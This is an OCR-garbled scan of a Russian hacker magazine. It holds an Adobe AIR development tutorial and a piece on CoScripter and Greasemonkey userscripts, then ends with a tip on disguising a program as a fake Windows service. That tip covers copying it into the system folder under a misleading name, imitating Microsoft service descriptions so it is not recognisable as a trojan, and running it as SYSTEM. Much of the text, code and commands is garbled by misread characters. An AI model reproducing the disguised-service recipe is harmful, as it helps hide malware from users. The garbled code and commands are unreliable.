<Ье ідЬк >1 5 0 < / Ъ.е і дкк > 

<Ѵ7ІЙЫі>300</Ѵ7ІЙЫі> 

< зу з Р етСЬг оте > з Р апсіаг с!< / зу з Р ешСЬг оше> 
<Сгапзрагеп1:>ба1зе</бгапзрагеп1:> 
<ѵізіЫе>кгие</ѵізіЫе> 
<гезІ2аЫе>ба1зе</гезігаЫе> 

< / іпіе іаІМіпскж> 

</арр1ісабіоп> 
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> СІѴСІ 

В материалах на 
диске ты найдешь 
дистрибутив АІР, 
ЗйК разработчика, 
примеры, а также 
исходники при- 
ложения, которое 
мы сегодня с тобой 
разработали. 




> Ііпкз 

Шр://еп.ѵѵікірес1іа. 
огд/ѵѵікі/КісЬ 
Іпіегпеі арріісабоп 

— общая информа- 
ция о РІА. 

ІаЬз.агіоЬе.сот/ 

ІесНпоІодіез/аіг 

— официальный 
сайт АбоЬе АІР. 







> Іп!о 

В качестве движка 
для парсинга и 
отображения веб- 
страниц применя- 
ется движок ѴѴеЬКіІ, 
который использует- 
ся в известнейшем 
браузере для Мае 
— Заіагі. 

Между прочим, 
у АбоЬе АІР есть 
немало конкурентов. 
Среди них: ЗаѵаРХот 
Зип Місгозузіетз, 
МогіІАа Ргізт ітот 
отМоііІІа Роипбабоп 
и ЗіІѵегІідЫ: от 
МісгоБО^’а. Думаю, 
мы о них еще пого- 
ворим :). 




ія начала разработки нужно скачать саму среду и ЗйК 
ізработчика 
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Для начала разработки нужно скачать саму среду и ЗйК 
разработчика 




Большая часть этих параметров понятна и без коммен- 
тариев. Хочу л ишь обратить твое внимание на элемент 
<іпі1іаІѴѴіпсІоѵѵ>, в котором описываются различные 
параметры окна (Шіе — название, ѵѵісііб — ширина, ИеідЫ: 

— высота и т.д.), а также то, что в нем будет содержаться. 
Заметь, в самом файле-дескрипторе никакие элементы 
интерфейса, равно как и реализации каких-либо функций 
приложений, не описываются. Но в то же время существует 
специальный параметр <соп1еп1>, который указывает на 
НТМІ_- или ЗѴѴР-файл — воттут-то и расположено описание 
внешнего вида приложения, а также ее функциональность 
(в обычном НТМБ-формате!]. Надо сказать, что параметров 
может быть намного больше (например, можно указать икон- 
ку, стандартный путь для установки приложения в систему и 
т.д.), подробности ты найдешь в официальной документации. 

г пишем код 

Как описать внешний вид нашего приложения? Назовем 
файл с версткой ТезЕЫтІ, какесли бы мы верстали самую 
обычную НТМБ-страничку. Я не буду останавливаться на 
НТМІ_-разметке, тем более что полный код будету нас на 
диске. Давай лучше подумаем, как реализовать заявленную 
функциональность. Все делается при помощи обычных 
веб-скриптов (на языке ^ѵаЗсгірІ:), а также расширенного 
набора функций, имеющегося у нас в распоряжении благо- 
даря использованию АІ В. Так как же мониторить состояние 
соединения? Платформа АІР поддерживает две специаль- 
ные функции: ІІРБМопіІог, отслеживающую доступность 
НТТР-страницы, а также ЗоскеіМопИюг, предназначенную 
для контроля за конечным ТСР-узлом. Нам удобнее исполь- 
зовать первую. Делается это в четыре этапа: 

1. Создается объект ПРІ-РедиезІ, которому в качестве 
параметра передается ІШІ_ страницы, состояние которой 
нужно отслеживать. Пусть это бѵдет ѵѵѵѵѵѵ.хакер.ги/сіеі'аии. 
азр . Чтобы каждый раз не загружать страницу полностью, 
устанавливаем для него режим НЕАО и будем получать 
только заголовки. 

2. Создаем объект ІІПІ_Мопі1:ог, который будет производить 



мониторинг, и передаем ему в качестве параметра только 
что созданный нами объекттипа 1)НІ_Недиез1: (где указан 
нужный ІІРІ_). 

3. Далее создаем обработчиксобытий для 1)РІ_МопіІог, 
который будет отслеживать значения события ЗіаІизЕѵепЕ 
8ТАТСІ8 и задавать функцию, описывающую то, как нужно 
реагировать на текущее событие. 

4. Запускаем мониторинг. 

Если тебе кажется это слишком сложным, не волнуйся. Прос- 
то прочитай код, и все сразу станет ясно. 

ѵаг топібог; 
бипсбіоп опЬоасІ ( ) { 

ѵаг гедиезб = пем аіг .ШЬКедиезб ( "Ъбб р:// 
\лмѵ7. хакер. ги/ сіе баиіб .азр" ); 
гедиезб .тебіюсі = "НЕАБ" ; 
топібог = пем аіг . ШЬМопібог ( гесщезб ) ; 
топібог . айсіЕѵепбЬізРепег ( 

аіг . ЗбабизЕѵепб . ЗТАТІІЗ , боЗбабиз ) ; 
шопібог . збагб ( ) ; 

} 

Обработчику событий помимо самого события передается 
также название функции, которое будет это событие обра- 
батывать (в нашем случае сІоЗіаІиз). От нас сейчастребу- 
ется описать ее таким образом, чтобы в случае отсутствия 
соединений программа делала кнопку ЗеагсИ неактивной и 
изменяла статус -и конку. Получается примерно следующий 
код (я привожу его с комментариями): 

бипсбіоп сіоЗбабиз ( еѵепб ) { 

ѵаг еіегп = босшпепб . збабизітаде; 

// Если соединение доступно 
іб (топібог . аѵаіІаЫе == бгие) { 

// Отображаем иконку зеленого цвета 
//и делаем кнопку ЗеагсЬ. доступной 
еіеш.зге = "дгеепЬідЪб .рпд" ; 



► озб 
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Воттак просто можно сделать интерфейс іРбопе’а 



Устанавливать ли приложение? Стандартное диалоговое окно для АІП 



сіосшпепб . зеагсЬРогт. зеагсЬВиббоп. (ЗізаЪІесІ = баізе; 
// Если соединение недоступно 
} еізе 
{ 

/ / Отображаем иконку красного цвета 
//и отключаем кнопку Зеагск 
еіеш.згс = "гесЗЫдкб.рпд"; 

(іоситепб . зеагскРогш. зеагскВиббоп.сІізаЬІесІ = бгие; 

} 



} 



Для того чтобы иметь возможность исполь- 
зовать функции АІП, необходимо предвари- 
тельно скопировать файлы зегѵісетопког.зѵѵі 
и АІВАІіазез.із из папки 50 К в папку с нашим 
проектом и подключить их в нашем ТезбЫтІ. В 
противном случае ничего работать не будет. 

<зсгірб згс= " зегѵісетопібог . змб " 
Суре= " аррі ісаб іоп/х- зЬоскѵ^аѵе- 
бІазЪ" /> 

<зсгірб буре="бехб/ ^аѵазс^ірб" 
згс="АІКАІіазез . д з"> 

</зсгірб> 



«Надо сказать, что по- 



мимо связки НТМЬЛІЗ 



переменную окружения РАТН или же в консоли каждый раз указывать в 
параметрах запуска полный путь до абі.ехе. Теперь можешь насладиться 
разработкой: отключить интернет-соединение и посмотреть, как про- 
грамма грамотно среагирует на это событие. 

Теперь, когда мы убедились, что все работает как надо, попробуем 
создать дистрибутив нашего приложения, который можно будет смело 
распространять среди других пользователей. Любой установочный файл 
АІП должен быть подписан сертификатом — таким образом проверяется 
подлинность приложения. Сертификат известного разработчика — это 
своего рода гарант качества приложения или по крайней мере отсутствия 
в сорцах зловредного кода. Выдать сертификат 
могутуполномоченные компании (например, 
ѴегуВідп и ТИаѵѵбе) , но на первых порах мы 
можем сгенерировать его сами, воспользовав- 
шись специальной утилитой АРТ: 



можно оыло с легкостью 



использовать новую 



технологию от АаоЬе 



— Ріех, специально раз- 



ІЕ 



аботанную для созда- 



ния КІА приложении» 



Как видишь, основные элементы нашего при- 
ложения очень просты. Я опущу ту часть кода, 
которая вызывает браузер и передаетзначение 
нашего текстового поля поисковику. На диске 

ты найдешь полную версию приложения и убедишься, что это реализу- 
ется самым тривиальным образом. Сейчас же самое время разобраться, 
что делать с полученным кодом! 

0 СОЗДАНИЕ АІК-КОНТЕЙН ЕРА 

Для того чтобы протестировать то, что у нас получилось, понадобится 
уже упоминавшаяся ранее утилита АйІ_ (АІВ ОеЬид баипсбег), которая 
находится в папке Ьіп в директории с 50К. Утилита консольная, поэтому 
все действия производятся в командной строке. А набрать нужно всего 
ничего: 

абі . ехе арріісабіоп.хті 

Единственный параметр — это файл-дескриптор приложения. Если 
вместо красивого окошка нашей программы ты получишь ошибку: 
«утилита асіі не найдена», следует добавить путь до папки в 5 О К/ В I N в 



асіб -сегбібісабе -сп ЗеІбЗідп -ои Беѵ 
-о "Ехашріе" -с 113 2048-КЗА сегб.рбх 
раззѵ70гсі 

Последний параметр, передаваемый этой 
утилите, является паролем, который ты затем 
используешь во время компиляции установоч- 
ного пакета. После этого образуется РРХ, кото- 
рый и будет использоваться далее для подписи 
нашего приложения. Теперь можно приступать 
к созданию установочного пакета: 



асіб -раскаде -збогебуре рксз12 - 
кеузбоге сегб.рбх хакер. аіг арріісабіоп.хші . 

После того как мы успешно введем пароль для сертификата, мы получим 
заветный файлик — хакер. аіг. Вот его с гордостью можно распростра- 
нять. После установки такого приложения у пользователя на его рабочем 
столе и в меню «Пуск» появится ярлык для запуска. Окно приложения бу- 
дет выглядеть самым обычным образом, и вообще все, чем наше прило- 
жение будет отличаться отдругих, — в его основе лежит обычный НТМІ_. 
Надо сказать, что помимо связки НТМ6ЛІ5 можно было с легкостью 
использовать новую технологию отАбоЬе — Ріех, специально разрабо- 
танную для создания РІА приложений. В качестве средств разработки 
подойдет известный среди дизайнеров Огеатѵѵеаѵегсустановленным 
плагином, АбоЬе Ріех Виіісіег на базе мощнейшей ЮЕ Есіірзе (+ АбоЬе 
АІП ріидіп Іог Ріех Виіісіег), а также набирающая обороты интегрирован- 
ная среда разработки Аріапа. Все это ты, разумеется, найдешь на нашем 
диске, лс 
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НЕСКОЛЬКО ЛОВКИХ ПРИЕМЧИКОВ ОТ РЕДАКТОРОВ «ХАКЕРА» 



Подход обычного юзера: браузер — это все, что нужно для серфинга. Зачем 
заморачиваться с непонятными плагинами и опНпе-сервисами, если браузер 
отлично показывает странички и запоминает пароли? Но мы-то с тобой зна- 
ем, каково это — проводить в Сети по 8 часов в день, когда с серфингом связа- 
на работа и общение с единомышленниками! Вот тут как раз и могут здорово 
помочь несколько хитрых приемчиков, которые мы для тебя подготовили. 



Ответь мне, знаешь ли ты работу противнее, чем та, которая 
требует изо дня в день одних и тех же тупых механических 
действий типа отслеживания запросов к какому-то конкретному 
сайту? Думаю, врядли! Я бы втаком случае, если бы и не сменил 
работу, то уж точно задумался, как весь этот процесс можно автоматизиро- 
вать, свести свое участие в действиях к минимуму. В статье «Пусть он все 
делает сам» (#1 1/07) мы уже рассказывали тебе о том, как можно запрограм- 
мировать выполнение практически любой последовательности действий на 
компьютере, однако в случае с работой в браузере задача сильно усложняет- 
ся. Обучить упомянутые в статье программы Аиіоіі и Аиіотіге распознавать 
на НТМІ_-страницахтэги, самим заполнять формы, передавать нужные 
параметры бесконечным веб-скриптам... Нет, пожалуй, это невозможно. Я 
всерьез задумался над этой проблемой, ежемесячно для каждого выпуска 
ОѴО-приложения к журналу вручную закачивая апдейты и заплатки для раз- 
ных версий ѴѴіпсІоѵѵз. Это совсем несложно один раз, но, повторяясь каждый 
месяц, начинаетсильно напрягать. Решение нашлось довольно быстро. 



^ УПРОЩАЕМ РУТИННУЮ РАБОТУ В СЕТИ 

В сентябре прошлого года корпорация ІВМ запустила новый бесплатный 
онлайновый сервис, решительно заявляя отом, что он сможет выполнять 
часть рутинной работы пользователей. Причем работы самой разнообраз- 
ной, той, что пожелают сами пользователи. Смысл разработки заключался 
в предоставлении интерфейса, позволяющего пользователям пошагово за- 
писать последовательность действий, которые они регулярно выполняют, а 
также механизма, который эту последовательность будет воспроизводить. 
Разработанная в исследовательском центре ІВМ Аігпасіеп Резеагсб служба 
получила название СоБсгірІег ( зегѵісез.аІрЬаѵѵогкз.іЬт.сот/созсгіріег ). 
Для задания последовательности действий теоретически можно использовать 
специальный скриптовый язык. Однако к такому геморройному методу едва 
ли кто-то прибегает, потому как намного удобнее процесстак называемого 
демонстрационного обучения. Ты показываешь СоЭсгірІегто, что нужно сде- 
лать, и уже в следующий раз он все повторяет сам. Другой вопрос: какемуэто 
показать? Для того чтобы упростить процесс и сделать его наиболее прозрач- 
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ным для пользователя, разработчики создали специальный плагин для Рігеіох. 
После авторизации на сервисе и установки плагина в правом нижнем углу 
браузера появляется значок СоБсіріег’а. Кликнув по нему, ты увидишь специ- 
альную панель сервиса, где отображаются собственно разработанные и реле- 
вантные скрипты, а также сценарии, рекомендуемые создателями ресурса. 

Для того чтобы записать свой собственный макрос, необходимо нажать на 
кнопку Ыеѵѵ, далее — Ресогсі, после чего в нужной вкладке браузера начать 
выполнять действия, требующие автоматизации. Например, частьзадачи, 
описанной мной выше, можно решить так: вызвать боодіе, набрать в поле 
поиска «тісгозой боѵѵпіоасі», перейти по первомулинку, нажать на сайте 
МісгозоЙ кнопку АбѵапсесІ зеагсЬ, выбрать категорию ѴѴіпсІоѵѵз Іірсіаіез и 
режим отображения результатов по 50 элементов на странице, после чего 
начать поиск. В это время в панели СоБсгірІег будут отображаться все 
новые и новые шаги сценария. Результатом будет следующий код: 

Ш.ПСІОѴ78 ІІрсіаЬез 

• до Со "ѵллтѵ7. доодіе . сот" 

• епСег "тісгозобС сіоѵтіоасіз" іпСо СЪе "Соодіе ЗеагсЬ" 
СехСЪох 

• сііск СЬе "Соодіе ЗеагсЬ" ЬиССоп 

• сііск СЬе "МісгозобС Вошііоасі" Ііпк 

• сііск СЬе "Асіѵапсесі ЗеагсЬ" Ііпк 

• зеІесС "Міпсіотсз ЗесигіСу & ЧрсІаЦез" ігот СЬе 
"СаСедогу : " ' з "СаСедогу:" ІізСЬох 



• зеІесС "50" ігош СЬе "КезиІСз Рег Раде:" ІізСЬох 

• сііск СЬе "КезиІСз Рег Раде:"'з "Со" ЬиССоп 

Полученному сценарию можно дать имя и сохранитьего в базе данных, 
причем пользователь может поставить пометку Ргіѵаіе, для того чтобы за- 
претить доступ к нему другим участникам сервиса. Все! Теперь этот скрипт 
легко вызвать прямо из панели браузера. 

Конечно, я привел очень примитивный пример, но даже его вполне доста- 
точно для демонстрации возможностей этой замечательной разработки. А 
способна она на многое! Можно, например, проверять электронную почту, 
автоматизировать поиск билетов на многочисленных сайтах авиакомпаний, 
записать последовательность действий для того, чтобы добраться до сильно 
спрятанного внутреннего раздела сайта (если сделать это напрямую из 1)РІ_ 
не получается, скажем, из-за апЫеасЬ-системы). Таким образом, юзеры могут 
избежать постоянного повторения рутинных операций вручную. Открытые 
скрипты интегрируются в ѵѵікі-ресурс и могут применяться несколькими поль- 
зователями совместно. Кстати говоря, перед тем как приступать к разработке 
своего собственного скрипта, нелишним будет про верить, не опередил ли кто- 
нибудь тебя. База сохраненных сценариев постоянно растет. 

□ УЛУЧШАЕМ СТРАНИЦЫ СО СТОРОНЫ КЛИЕНТА! 

Приходила ли тебе в голову мысль отом, что часто посещаемый тобой 
сайт можно было бы улучшить, добавив ему функциональности, о которой 
разработчики, возможно, даже и не задумываются? Сказать по правде, 



Полезные скрипты 
для Сгеазетопкеу 

ЬіпкіІуііп§ 

Ьар : / /шегзсгірщ . оге/зсгіріз ЛІю\ѵ/22 5 4 

Очень часто ссылки, ведущие на исходящие ресурсы, не обо- 
значаются тэгом <а Ьгеі> (чтобы в переменных окружениях не 
афишировать, откуда перешел пользователь). Этот очень про- 
стой скрипт просматривает НТМЬ-код, ищет по шаблону кусочки 
текста, похожие на ссылки, и оформляет их соответствующим 
образом. 

Ы Іпвіапі: Соттепі 

Ьйр : / /шегесгірщ . ог ^ /зсгірЩ ЛЬаѵѵ /1166 

Сценарий позволяет оставлять комментарий на пост в Ілѵеіоигпаі, не 
переходя с текущей страницы. После нажатия «Оставить комментарий» 
появляется всплывающая панелька, где ты можешь быстро и удобно оста- 
вить свой коммент. 

Соодіе ТЬишЬпаіІз 

Ьшэ : //изегзсгірщ . огч/зсгірЩ /зЪоѵг / 1862 

Добавляет графическую превьюшку для каждой страницы в результатах 
поиска Соо§1е. 

ѴідеоетЪед 

Ьйр : / /шегесгірщ . ог ^ /зсгірЩ ЛЬоѵу /7686 

Позволяет закачать видео с большинства видеохостигов, включая УоиТиЪе, 
Соо§1еѴіс1ео, Ѵітео (всего 21 сервис). 

КиШЬе Ооѵѵпіоадег 

Ьйр : //изегзсгірЩ . огуАсгірЩ /аЬоѵѵ / 12265 

К сожалению, ѴМеоетЪесІ не дружит с отечественным КишЬе, но этот 
скрипт способен исправить положение. 

ЬоокІШрг 

Ьцр : / /изегзсгірЩ . ог^/зсгірЩ /5Ію\ѵ /77 1 5 

С помощью этого скрипта можно быстро найти информацию в ѴѴікіресІіа 



или любом другом источнике, просто выделив нужное слово на текущей 
странице. 

РоШег84бтаі1 

Ьц р://и5ег5сгірГ5.ог2/5сгірі:5/5Ііоѵѵ/8810 

Сценарий предназначен для тех, кто так и не привык к системе меток в 
Стай и хочет использовать привычную иерархию папок-каталогов. 

Стаіі ВеаиШіег 2.3 

ЬЩ) : / /изегзсгірщ . ог у Асгірщ /зііоѵѵ /8212 

Скрипт прячет всю рекламу в Стаіі, расширяет поле письма, удаляет слово 
ЪеГа из логотипа и всячески улучшает веб-морду почтовика, добавляя пару 
полезных кнопочек. 

Стаіі Аддопв 

1іНр://и5ег5сгір1:5.ог^/5сгір1:5/5Ііо\ѵ/19956 

Это еще один скрипт, который значительно расширяет интерфейс Стаіі, 
интегрируя его с Соодіе Саіепбаг. 

К88 + А*от Реед 8иЬвсгіЬе ВиШт Сепегаііог 

Ьцр : / /изегзсгірЩ . ог^АсгірЩ АЬоѵу /688 

Если в коде страницы где-то прописана ссылка на К53/АТОМ-фид, то этот 
скрипт тут же выдаст линк для твоего агрегатора. 

ІЛ ТЬгеад ІІпіЫдег 

Ьйр : / /и5ег5сгірГ5 . ог^ЛсгірЩ /зЪоѵг /5 552 

Ы ТЬгеаб ІІпіоЫег предназначен для нашего любимого ЖЖ и нужен для 
того, чтобы открывать все ветки комментариев в одном месте (по умолча- 
нию каждую ветку нужно открыть вручную) . 

Соодіе Ад Кетоѵег 

Ьйр : //изегзсгірЩ . огуАсгірЩ /зЬоѵу / 1731 

Сценарий удаляет рекламу со страниц результатов поиска Соо§1е. 

Іізегвсгірііз.ог^ Капк Ьу Рориіагііу 

1Шр://и5ег5сгш1:5.оге/5сгір1:5/5Ііо^ѵ/11676 

А этот простенький скрипт упростит поиск популярных (а значит, 
полезных) скриптов на сайте ІІзегзсгірЩ.ог^. Чем популярнее скрипт, тем 
больше соответствующих иконок будет рядом с ним отображаться. 
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меня такие идеи посещают постоянно. Ну, скажем, здорово было бы, если во 
время просмотра гаджетов в отдельной ненавязчивой панельке выводился 
бы списокс наиболее выгодными предложениями в онлайн-магазинах. 
Сложно? Да ничего подобного, идея более чем реализуемая и для этого 
даже не придется ничего изобретать! 

Для того чтобы воплотить замысел в жизнь, опять-таки понадобится РігеЬх, 
хотя подойдет и любой другой браузер, построенный на движке Ѳеско, 
например ЕрірЬапу или Могіііа ЗиЛе. Имен но сними совместимо специаль- 
ное расширение бгеазетопкеу [ ѵѵѵѵѵѵ.дгеазезроЕпеі ]. которое позволяет 
изменять просматриваемые страницы буквально на лету. Вернее, сам 
аддон никоим образом их не трогает, и после его установки ты ничего не 
заметишь. Но он позволяетзапускать Заѵа-скрипты, которые как раз и про- 
изводят все изменения! Их можно использовать, чтобы исправлять ошибки 
в визуализации какого-либо ресурса или чтобы подгонять его под себя, а 
можно добавить ему новую функциональность или комбинировать данные 
с нескольких ресурсов. Все зависиттолько оттвоей фантазии! При этом 
все изменения, вносимые скриптами для бгеазетопкеу, будут казаться 
частью оригинальной веб-страницы. Вотлишь несколько примеровтого, 
что можно сделать: 

• совместить бтаіі и боодіе геабег, чтобы вместе с письмами показыва- 
лись ^55-подписки; 

• отображать список предложений с ценами при просмотре какого-либо 
товара в инете; 

• удалять рекламу со множества сайтов, включая назойливые рорир’ы и 
текстовую рекламу Ооодіе; 

• автоматически заполнятьформы; 

• связывать контент страницы с коррелированной информацией с других 
ресурсов; 

• сохранять РІ_ѴсуоиІиЬе.сот и аналогов одним кликом мыши. 

г ЧТО ТАКОЕ СКРИПТ? 

Пользовательский скрипт (сценарий] — это просто часть программного 
кода на языке баѵаЗсгірІ, которая рассказывает бгеазетопкеу, где и когда 
она должно быть запущена. Каждый пользовательский скрипт предназна- 
чен для конкретной страницы, сайта или группы сайтов, при этом он может 
сделать все, на что способен баѵаВсгірк По сути, он может делать даже 
больше, потому что бгеазетопкеу предоставляетспециальные функции, 
которые доступны только для подобных сценариев. 

Скрипты можно как выбрать из огромнейшего депозитария, так и написать 
самому. Давай сначала разберемся с первым вариантом. Наибольшая 
коллекция скриптов, написанная разными людьми для решения самых 
разнообразных задач, располагается по адресу изегзсгіріз.ога . Объясняю, 
как это работает: сначала ты устанавливаешь саму бгеазетопкеу, после 
чего заходишь на сайт изегзсгірЕз.ога . выбираешь нужный скрипт и жмешь 
прямо на страничке кнопку ІпзІаіиЬіз зсгірі. Воти все: браузер сам поймет, 
что ты хочешь задействовать этот сценарий. Я, например, установил 



скрипт для быстрой загрузки видео на ресурсе в ѵкопіакЕе.ги и сценарий 
для раскрытия всех веток комментариев в ЖЖ. 



г ПИШЕМ СКРИПТСАМИ! 



Хорошим подспорьем в деле написания скриптов для бгеазетопкеу 
является книжка «Оіѵе іпіо бгеазетопкеу» ( ѵѵѵѵѵѵ.біѵеіпіоагеазетопкеѵ. 
огд ]. Книга, некогда опубликованная авторитетным издательством О’РеіІІу, 
сейчас распространяется в инете абсолютно бесплатно. Единственная про- 
блема в том, что часть информации 



в ней уже устарела, поэтому книгу 
рекомендую использовать только 
в качестве основы. В большей 
степени понадобится информация 
о баѵабсгірі:, потому каклюбой 
сценарий для бгеазетопкеу разра- 
батывается именно на этом языке, 
ббязательное условие для любого 
скрипта — это формат имени, со- 
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стоящий из имени скрипта и суффикса .изещБ. Файлы, не отве- 
чающие этому критерию, «обезьянка» попросту не признает. 
Для того чтобы показать, как выглядит скрипт, напишем про- 
стенький сценарий, который при посещении страницы будет 
выводить всплывающее окошко с надписью «Неііо, ѵѵогісі!». 

Он будет состоять из одной строчки на іаѵаБсгірІ: 

аІегЦ ( "Неііо, ѵтогІсП " ) ; 

Сохраняем файл, например, в ЬеИо.изещз и сігад’п’сігор’ом 
переносим его в окно Рігеіох’а. бгеазетопкеу моментально 
унюхает приготовленное ей лакомство и предложит устано- 
вить сценарий. Повода отказываться я не вижу. По умолчанию 
скрипт применяется для всех сайтов сразу, поэтому всплы- 
вающее окошко ты увидишь при посещении любого сайта. 
Сделать так, чтобы скрипт выполнялся при посещении строго 
определенных ресурсов, можно, указавтак называемые 
метаданные. 



Наш пример! 

кШкр : / /уоипдрир . пек/ 

Выводит окошко с сооб- 



// ©паше 
// ©патезрасе 
изегзсгіркз 
// ©безсгіркіоп 
щением 

// ©іпсіибе Ьккр : //хакер . к 16/* 

// ©іпсіисіе Ьккр: / /ілтѵ\м . хакер . кіб/* 

// ==/изег8сгірк== 
аіегк ( "Неііо, ѵтогіб! " ) ; 

Думаю, смысл каждой из переменных метаданных понятен 
из названия. Единственное, что необходимо отметить, — во 
время описания области действия скрипта мы использовали 
звездочку, обозначающую любой символ, а также служебную 
последовательность Псі (іор Іеѵеісіотаіп], указывающую на 
то, что вместо нее может стоять обозначение любого домена 
первого уровня (.сот, .ги ит.д.). 

Важно понять, что Ѳгеазетопкеу инжектирует с крипт внутрь 
страницы, как если бы он был вставлен туда веб-мастером 
во время разработки страницы. Поэтому возможности таких 
скриптов фактически ничем не ограничены, хотя некоторые 
нюансы все-таки есть. Учить іаѵаБсгірІ’у мы тебя сейчас, 
естественно, не будем (обрати внимание на выносы, где при- 
ведены ссылки на качественные мануалы для начинающих). 
Но еще один пример обязательно рассмотрим. 

Осознав когда-то, что я не в состоянии синхронизировать за- 



кладки между всеми своими компьютерами, я стал использо- 
вать для иххранения небезызвестный онлайн-сервис беі.ісіо. 
из. Отличный ресурс всем меня устраивал, за исключением 
того, что среди букмарков нередко попадались посторон- 
ние рекламные линки. Ну что ж, надо было пробовать отних 
избавиться! После беглого изучения страницы стало ясно, что 
спонсорские линки размещаются в блоке <біѵ>.. <с!іѵ>, отно- 
сящемся к классу зропзогесі. Следовательно, для того чтобы 
удалить их, нужно было всего ничего — найти все такие блоки 
и в параметрах отображения сделать их невидимыми. Весь 
скрипт состоит из одной строчки кода на І5: 

// ==изег5сгірк== 

/ / ©паше (іеі . ісіо . из абз гетоѵег 

/ / ©патезрасе кккр : / /шм . хакер . сот . сап 

/ / ©безсгіркіоп Скрипт удаляет реклам/ с беі . ісіо . из 
/ / ©іпсіисіе Ъккр : / /беі . ісіо . из / * 

// ==/изег5сгірк== 

боситепк . декЕІетепкВуІб ( " зропзогеб" ) . зкуіе . бізріау 
= "попе" ; 

Ш СПОСОБЫ ОТЛАДКИ СЦЕНАРИЯ 

Написать сложный скриптбез единой ошибки итак, чтобы он 
сразу за работал, почти нереально. Поэтому скрипт, хочешь 
литы того или нет, придется отлаживать. Но вотзагвоздка: 
поумолчанию никаких сообщений об ошибках не выводится, 
и даже встроенная в Могіііа Рігеіох консоль іаѵаБсгірІ будет 
молчать как партизан. Для того чтобы включить отображение 
всех ошибок, необходимо вызвать конфигбраузера (набрав 
в адресной строке аЬоиксопйд) и задать для параметров 
)аѵа5сгір1.орбоп5.5І"ю\л/ІпСоп501е и )аѵа5сгіркор{іоп5.5Ігісі: 
значениеігие. Помимо этого можно использовать функции 
6М_1од или замечательный плагин для отладки РігеЬид ( ѵѵѵѵѵѵ. 
деНігеЬид.сот ). В последнем случае в нужных местах скрипта 
необходимо поставить следующую строчку кода: 

ипзаіеМіпбоѵ? . сопзоіе . Іод ( " Ьіпк : %о " , 
боситепк . 1 іпкз [ 0 ] ) 

^ ДУМАЙ 

В нижней части сайта ѵѵѵѵѵѵ.изегБсгірІБ.ога приведена заме- 
чательная фраза: «Весаизе іІ'зуоигѵѵеЬ». Потому что это твой 
веб! Не какого-тотамдяди,атвой!Ты вправе сам выбирать, 
в каком виде получать информацию, как делать это более 
эффективно. Атеперьты знаешь, как это реализовать! ц-ц 



> ѵѵагпіпд 

В депозитарии 
скриптов для «обе- 
зьянки» встреча- 
ются вредоносные 
скрипты, являющи- 
еся модификациями 
вполне безопасных и 
полезных сценари- 
ев, но с вкраплени- 
ями кода, которые 
воруюттвои соокіе. 
Будь осторожен! 




> Ііпкз 

уѵікі.дгеаБѲБроІ.пе І 

— домашняя страни- 
ца бгеазтопкеу. 

ѵѵѵѵѵѵ.ѵѵЗбсЬооіб. 

сот/із/сІеіаии.аБр 

— отличный мануал 
по іаѵаБсгірІ для 

НОВИЧКОВ. 

ЬМр://101оиі.сот/ 
ІББ.рбр — видеоуро- 
ки от гуру по І5. 



> іп^о 

Помимо СоБсгірІег 
для Рігеіох существует 
другой аналогичный 
плагин — іМасгоз. 

Ищи его на эсісіопб. 
тогіііа.огд . 



Сгеазетопкеу 
и Орега 

Несмотря на то, что расширение Сгеазетопкеу предназначено для брау- 
зеров, построенных на движке Сеско, разработанные для него скрипты 
можно использовать и в Орега! Дружно говорим спасибо разработчикам 



этого замечательного браузера, которые включили в состав своего 
продукта самые важные функции и в том числе поддержку сторонних 
скриптов! Как это использовать? Сохраняем нужный 65-скрипт в отдель- 
ную папку, после этого, находясь на сайте, где его нужно применить, 
кликаем в контекстном меню на «Изменить настройки узла. Появля- 
ется окошко с несколькими вкладками, из которых выбираем «Сцена- 
рии» и в нижней форме «Файлы пользователя ІаѵаЗсгірГ» указываем 
папку со скриптом. Вот, собственно, и все! 
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ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 




АДАЧА: 



ОСУЩЕСТВИТЬ НЕСТАНДАРТНУЮ АВТОЗАГРУЗКУ. 

РЕШЕНИЕ: 



Одними из первых при запуске системы стартуют сервисы. Создадим фей- 
ковую службу для автозагрузки нашей проги. 

Для начала определимся, чем отличается обычное ѵѵіп-приложение от 
сервиса? 

Сервис имеет определенную структуру, должен откликаться на управляю- 
щие команды (запуск, остановка, пауза, продолжение работы) и сообщать 
о своем состоянии (работает, остановлен и т.д.). Есть несколько способов 
запустить приложение как службу ѴѴіп б оѵѵз: от написания и использования 



% 



№НА «.ГІІШМ4Н.1 




Ькн-віи 




Готовый сервис 



полноценного сервиса до запуска любой проги каксервиса при помощи 
іпз1;5гѵ.ехе и вгѵапу.ехе из ѴѴіпбоѵѵз Ревоигсе КіГ Рассмотрим один из 
вариантов. 

1 . Копируемся в системный каталог, называемся как-нибудь мутно, напри- 
мер, «сзгвс.ехе». 

2 . Регистрируемся в реестре. Создаем раздел под свой сервис: 
[НКЕѴ_Е0САЕ_МАСНІМЕ\5Ѵ5ТЕМ\СиггепЮоп1хо15еі\5егѵісе5\С5Г5с] 

3. Создаем строковый параметр (РЕ6_52) с именем «Оезсгірііоп». В каче- 
стве значения необходимо в паре предложений описать, чем занимается 
сервис. Нет, не надо писать туда «обычный троян» и т.п., а лучше посмот- 
реть описания стандартных Майкрософтовских сервисов и вбить что-то 
похожее. 

4 . Следующий строковый параметр «ОіврІауМате». Так будет выглядеть 
дружественное пользователю название службы. Значение «СЗРзс-кли- 
ент» вполне подойдет. 

5 . Далее, РЕ6_52«0Ь)есіЫате». Ставим значение «1_осаІЬу5Іет» для 
запуска отимени 5У5ТЕМ. 

6. Создаем и оставляем пустыми параметры типа РЕ6_МІЛ_ТІ_52 
«ОерепсІОпбгоир» и «ОерепбОпЗегѵісе». 

7. Параметр ПЕ6_52«ІтадеРа1:Ь2» заполняем как«%5у5ІетВоо1:%\с5Г5с. 
ехе». Это и есть наш экзешникзапускаемого сервиса. 

8. Определяем тип загрузки нашей службы. Добавляем РЕ6_0ѴѴ0Р0 
«51:аг{» со значением «2», что соответствует за грузке вместе с системой, но 
после драйверов. В «Службах» отображается как«авто». ВЕ6_0ѴѴ0В0 па- 
раметр «ЕггогСопІгоІ» ставим в «1 », РЕ6_0ѴѴ0Р0 параметр «Туре» ставим 
в 120 (0x00000120). 

Итак, мы попытались закосить под сервис, но если пользователь и не 
заметит подвоха, то Винда при загрузке службы понимает, что подсунули ей 
никакой не сервис. Однако проверка идетбольше 20 секунд (пользователь 
ничего не видит), и мы спокойно копируемся во второй файл, например в 
